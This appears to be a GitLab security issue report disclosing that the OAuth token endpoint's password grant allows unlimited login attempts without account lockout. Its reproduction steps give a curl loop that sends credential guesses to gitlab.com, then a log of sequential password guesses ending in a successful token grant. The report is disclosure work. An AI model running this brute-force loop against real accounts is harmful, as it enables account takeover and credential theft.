Skip to content

ESCALATED: OAuth Token Endpoint Susceptible to Brute-Force Attacks and Credential Spraying

Summary

The endpoint https://gitlab.com/oauth/token and grant_type=password parameter allow potential attackers to evade all safe-guards against credential spraying and account brute-forcing which exist on gitlab.com/users/sign_in, among them:

  • An arbitrary number of requests can be sent with arbitrary cadence, in this way credentials can be reliably tested.

  • Accounts being brute-forced are never blocked, even after 10 failed attempts at generating valid OAuth tokens. This is usually the case for logging attempts over /users/sign_in.

Steps to reproduce

The absence of rate-limiting can be tested easily by repeatedly sending POST grant_type=password requests to oauth/token as shown on https://docs.gitlab.com/ce/api/oauth2.html#resource-owner-password-credentials

while true; echo -n `date +'%T'` ' -) ' ; do curl --data 'grant_type=password&username=mymail@domain.com&password=mypassword' --request POST https://gitlab.com/oauth/token; echo; done

Logs from real tests will look as follows:

1561656152.6030874  e:  myemail@gitlab.com p:  abcde@  valid:  False 401
1561656153.3011422  e:  myemail@gitlab.com p:  abcdeA  valid:  False 401
1561656154.5376472  e:  myemail@gitlab.com p:  abcdeB  valid:  False 401
1561656155.155709   e:  myemail@gitlab.com p:  abcdeC  valid:  False 401
1561656155.7969038  e:  myemail@gitlab.com p:  abcdeD  valid:  False 401
1561656156.7311993  e:  myemail@gitlab.com p:  abcdeE  valid:  False 401
1561656157.3582034  e:  myemail@gitlab.com p:  abcdeF  valid:  False 401
1561656158.0892327  e:  myemail@gitlab.com p:  abcdeG  valid:  False 401
1561656158.9248016  e:  myemail@gitlab.com p:  abcdeH  valid:  False 401
1561656159.6772146  e:  myemail@gitlab.com p:  abcdeI  valid:  False 401
1561656160.5643692  e:  myemail@gitlab.com p:  abcdeJ  valid:  False 401
1561656161.3276572  e:  myemail@gitlab.com p:  abcdeK  valid:  False 401
1561656162.0689363  e:  myemail@gitlab.com p:  abcdeL  valid:  False 401
1561656162.8939586  e:  myemail@gitlab.com p:  abcdeM  valid:  True 200

{'access_token': '********************************************', 'token_type': 'bearer', 'refresh_token': '*******************************************************', 'scope': 'api', 'created_at': 1561473301}

cc @gitlab-com/gl-security/secops @gitlab-com/gl-security/appsec @asaba

Edited by GitLab SecurityBot